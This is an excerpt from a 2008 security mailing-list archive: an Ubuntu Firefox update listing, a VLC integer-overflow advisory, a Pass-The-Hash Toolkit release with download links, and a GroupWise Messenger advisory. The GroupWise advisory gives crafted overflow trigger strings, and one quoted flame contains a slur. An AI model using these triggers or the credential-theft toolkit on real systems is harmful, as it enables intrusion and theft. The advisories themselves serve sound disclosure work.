e674ecd502eacda834368c557e1b6143 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 9294592 79e1b6e99dbce290cd56ba6755dc881d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 228854 5fdbf6bd20f86f70797316b36ab4d173 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 163288 b78c777702f3df4f0ebea2ebe63ce6d6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 254924 3465792dc109b728a78d6ffb29f53376 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_i386.deb Size/MD5: 809578 4b2310f5cb97c4e296180cb40756a894 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 52298392 2b28d6ee19d84e536245eb95d0a8a909 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 3188938 7018bb95c07c6aaa97cde7b972a20166 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 90740 bc84e90a93fb5b7b9f20d67c86c03a2e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 62926 e57644c65aea1a4f90f523353bf1e5b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 10365110 3c0dfb58abb3d0efa6735f4cc98d7b20 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 228860 3ba05d40bcb2a5f81c1b109015c4784a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 180002 733154c484aa8048529f64e366d8cb29 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 254952 ced3de59adae121b57919d85ef2ee7c8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_powerpc.deb Size/MD5: 896026 c822eb94fd5cebae2c49ffd3afcfaef4 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 49823786 e4c4ad5e13abfc980dcb8845170a6066 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 3175916 2736c2ab5c8fe48c0f2bfc670237f7d3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 86592 9794cd53ceaab43313006dc928090ca6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 62138 c4d4d60255fa8a232436103ecbbe8d26 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 9571186 d2d4086ccfe3d59683645a431822f0f4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 228848 a3b0b8cf03b5ccd5da1e4bfe4debde7e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 162076 6264a5f87b7d8492afbeec02f14a97fe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 254936 ba67be4782a972a18fe465fca598b34b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.15+0nobinonly-0ubuntu0.7.4_sparc.deb Size/MD5: 801408 074ce0ac99fbfe8467768644edc25dad Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.diff.gz Size/MD5: 193549 3df61e6e5dda06822772c81f55a5e09c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10.dsc Size/MD5: 1189 e474d538b042590c54cf779317c127be http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly.orig.tar.gz Size/MD5: 37810765 e123b1b65f4ed97980590928f961c5f2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.15+1nobinonly-0ubuntu0.7.10_all.deb Size/MD5: 200814 973c84088bba9fe7619562607649ae91 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 78049446 ff9b6ef4ff7e676de1e7631bf7cb8a3d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 3197256 c69ca60dc08dc4dd83b53df27cbd7f32 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 98146 cb5365397df1022104b9c9d8de5b6409 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 67152 1b33bdeb31a95455a4ea0a6024cc76e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_amd64.deb Size/MD5: 10460276 7b2bf1c6f2e685e09d1e5dd937a380b4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 77181324 f27d2a52d29eb953a2a2b2e72251ecfe http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 3184840 e58f0f841248dbdc40513724ddaa84cf http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 91840 87c455efc0df2403f962b0df9d4e6177 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 66434 2bf2dc0e8a6333c58577db96edd98e35 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_i386.deb Size/MD5: 9203290 7e0ebb7384bd4b504bff560e370291a5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 77460616 71b471e86aa5c6e2eac09a3251b80d94 http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 3182378 d90bfbae7b9743aeb4d592f517361c90 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 91500 97848bd89ef94ffc7bd095185fe508f0 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 66380 8dd93b124088314c1449195ce8201f6c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_lpia.deb Size/MD5: 9062590 4850c76f7d1e1c6ca9658863ac77e15f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 80664386 0d6ef7225c028ede3092d9f86af0d736 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 3200788 05c74bf9d2ee0d0407c41a83651ea0a4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 96178 58b2e155dc810ef5ea790e7af6bbd71d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 67430 8b6d5d82b36e32c68b1b8eb2aeddd06e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_powerpc.deb Size/MD5: 10303234 18af52f985e61e7b4d9f573aafd5b6d6 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 78015546 63c0534c7bba8d01e36158fb58b6693e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 3182386 45c83bd5709c26e42d19a4a02d7e72ec http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 91608 ad47d76f9e3afec9105cefaf73510d82 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 66516 32af5ef7efccbd08fa8d83811d197384 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.15+1nobinonly-0ubuntu0.7.10_sparc.deb Size/MD5: 9453348 532a9a6fac002e08dfde90555242d54a -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/8f5bfdf3/attachment.bin From mrdkaaa at stream.cz Wed Jul 2 17:33:47 2008 From: mrdkaaa at stream.cz (mrdkaaa) Date: Wed, 02 Jul 2008 18:33:47 +0200 (CEST) Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. In-Reply-To: <20080702082943.2811aba5@wssyg117.sygroup-int.ch> Message-ID: <20.36-21823-232776016-1215016427@stream.cz> Tonnerre, does it hurt you to use your brain for thinking? m. > ------------ P?vodn? zpr?va ------------ > Od: Tonnerre Lombard > P?edm?t: Re: [Full-disclosure] Full-Disclosure? introducing lul-disclosure. > Datum: 02.7.2008 08:31:26 > ---------------------------------------- > Salut, > > On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote: > > Are you ready for a site that isn't full of fagottry? Where Gadi cant > > steal your money or eat your lunches? Where you can freely submit > > lulz to be published? Where Theo's defeat and denial are brought to > > light? Wait no more! > > You mean a site which evidently cannot tell the difference between > local and remote root vulnerabilities? (The local root exploit for > obsd4 which is published on that site contains a patch to increment the > count of _remote_ vulnerabilities on the obsd web site.) > > Tonnerre > -- > SyGroup GmbH > Tonnerre Lombard > > Solutions Systematiques > Tel:+41 61 333 80 33 G?terstrasse 86 > Fax:+41 61 383 14 67 4053 Basel > Web:www.sygroup.ch tonnerre.lombard at sygroup.ch > > > From remove-vuln at secunia.com Wed Jul 2 15:53:27 2008 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 2 Jul 2008 16:53:27 +0200 Subject: [Full-disclosure] Secunia Research: VLC Media Player WAV Processing Integer Overflow Message-ID: <200807021453.m62ErRFj011250@ca.secunia.com> ====================================================================== Secunia Research 02/07/2008 - VLC Media Player WAV Processing Integer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * VLC Media Player 0.8.6h on Windows NOTE: Prior versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: Remote ====================================================================== 3) Vendor's Description of Software "VLC media player is a highly portable multimedia player for various audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols." Product Link: http://www.videolan.org/vlc/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in VLC Media Player, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer overflow error within the "Open()" function in modules/demux/wav.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted WAV file having an overly large "fmt" chunk. Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 0.8.6i, which should be available soon. Do not open untrusted WAV files. ====================================================================== 6) Time Table 27/06/2008 - Vendor notified. 30/06/2008 - Vendor response. 02/07/2008 - Public disclosure. ====================================================================== 7) Credits Discovered by Alin Rad Pop, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2430 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-29/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From xploitable at gmail.com Wed Jul 2 19:16:38 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 2 Jul 2008 19:16:38 +0100 Subject: [Full-disclosure] n3td3v podcast Message-ID: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> n3td3v is starting a podcast soon, I will be talking about the latest news post on n3td3v - Google Groups ... watch the internet for more info. All the best, n3td3v Public website: http://n3td3v.googlepages.com From hernan at gmail.com Wed Jul 2 19:42:15 2008 From: hernan at gmail.com (Hernan Ochoa) Date: Wed, 2 Jul 2008 15:42:15 -0300 Subject: [Full-disclosure] Release of Pass-The-Hash Toolkit v1.4 Message-ID: Source Code: http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz Win32 Binaries: http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz Documentation/info: http://oss.coresecurity.com/projects/pshtoolkit.htm http://oss.coresecurity.com/pshtoolkit/doc/index.html http://hexale.blogspot.com http://www.hexale.org/forums What's new?: (http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW) *Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3 without requiring any update) *New -t switch for whosthere/whosthere-alt: establishes interval used by the -i switch (by default 2 seconds). *New -a switch for whosthere/iam: specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash) The idea is that, if you find yourself in a version of Windows where whosthere/iam don't work (and iam-alt/whosthere-alt don't work either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC script included in the Pass-The-Hash toolkit, and use the addresses found by the script with the -a switch. This basically allows you to specify addresses at runtime to whosthere whithout the need to recompile the tool. *New -r switch for iam/iam-alt: Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe) *genhash now outputs hashes using the LM HASH:NT HASH format *several bugfixes and stuff From noreply at infobyte.com.ar Wed Jul 2 22:13:01 2008 From: noreply at infobyte.com.ar ([ISR] - Infobyte Security Research) Date: Wed, 2 Jul 2008 18:13:01 -0300 Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow Message-ID: <200807021813.01654.noreply@infobyte.com.ar> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 || || [ISR] || Infobyte Security Research || www.infobyte.com.ar || 07.02.2008 || .:: SUMMARY Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow Version: 2.0, It is suspected that all previous versions of Groupwise Messenger Client are vulnerable. .:: BACKGROUND Novell GroupWise Messenger is a corporate instant messaging product that uses Novell eDirectory? as its user database More info: http://www.novell.com .:: VULNERABILITY VIDEO DEMO http://www.infobyte.com.ar/demo/ISR_groupwise_messenger.html .:: POC ISR-groupwisemsn.pl, simple fake groupwise msn server. http://www.infobyte.com.ar/developments.html .:: DESCRIPTION Issue 1: - ------- This issue is due to a failure of the application to securely parse the server's response. The application server works similarly to HTTP protocol, default tcp port 8300. The server always response the client's request with something like this: " HTTP/1.0 200 \r Date: xxx, xx xxx xxxx xx:xx:xx GMT\r Pragma: no-cache\r Cache-Control: no-cache\r \r %VALUES% \0\0\0 \0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0 \0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0 " If the client application receive a server response to any request like the following, a stack overflow is occurred: " HTTP/1.0 200 \r Date: xxx, xx xxx xxxx xx:xx:xx GMT\r Pragma: no-cache\r Cache-Control: no-cache\r \r %VALUES% \0\0\0 \0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0 \0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"+ "AAAAAAAAAA...." x 5000 Issue 2: - ------ We found another stack overflow regarding the client's popup alerts, when you receive a message of another user the server send a string like this to the client: "l\0\0\x001\0\0\0CN=XXXX,OU=XX,OU=XXXX,OU=XX,OU=XX,O=INFOBYTEXX\0'\0\0\0[87 1F8247-4B110000-0A01C80A-6C20-010 0]\0\1\0\0\0\xE4\0\0\0{\\rtf1\\fbidis\\ansi\\ansicpg1252\\deff0\\deflang308 2{\\fonttbl{\\f0\\fswiss\\fprq2\\fcharset0 fontname;}}\r\n{\\colortbl;\\red0\\green0\\blue0;}\r\n\\viewkind4\\uc1\\par d\\ltrpar\\li50\\ri50\\cf1\\f0\\fs20 MESSAGE\\par\r\n}\r\n\0"; If a client receive a string like this but in any place of the string it's added an "A" x 5000 you have another stack overflow. .:: IMPACT Both vulnerabilities permit arbitrary code execution. .:: VENDOR RESPONSE Vendor advisory: http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5026700.html .:: CVE INFORMATION Id: CVE-2008-2703, CVE-2008-2704 Web: http://cve.mitre.org .:: DISCLOSURE TIMELINE 01/12/2008 Initial vendor notification 01/13/2007 Initial vendor response notify research 06/10/2007 Coordinated public disclosure .:: CREDIT Francisco Amato is credited with discovering this vulnerability. famato][at][infobyte][dot][com][dot][ar .:: LEGAL NOTICES Copyright (c) 2007 by [ISR] Infobyte Security Research. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Infobyte Security Research Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from infobyte com ar Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iQEVAwUBSGvqefr3+fypwNnjAQLsawf/eNzyFnlo5MgWhZUTIlvfbAj7C5OtVYBm +uVGOxG4ljtfYj7R5UPkHMUxXKOGDjbkeot0ohOgxhW